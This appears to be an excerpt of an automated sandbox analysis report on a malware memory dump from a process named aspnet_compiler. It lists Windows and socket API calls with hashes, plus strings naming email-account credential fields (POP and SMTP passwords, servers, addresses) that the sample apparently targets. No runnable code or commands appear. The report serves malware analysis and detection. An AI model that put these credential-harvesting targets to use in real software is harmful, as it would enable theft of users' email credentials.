                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseFind
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1863332320-0
                                                                                                                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                                                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                                                                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                                                      APIs
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                                                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                                                      APIs
                                                                                                                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExistsFilePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1174141254-0
                                                                                                                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                                                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                                                      APIs
                                                                                                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: recv
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1507349165-0
                                                                                                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                                                      APIs
                                                                                                                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: closesocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2781271927-0
                                                                                                                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                                                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                                                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                                                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                                                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                                                      APIs
                                                                                                                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                                                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                                                                                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                                                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                                                                                      APIs
                                                                                                                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                                                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                                                                                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                                                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1312198159-0
                                                                                                                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                                                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                                                      • API String ID: 0-2111798378
                                                                                                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64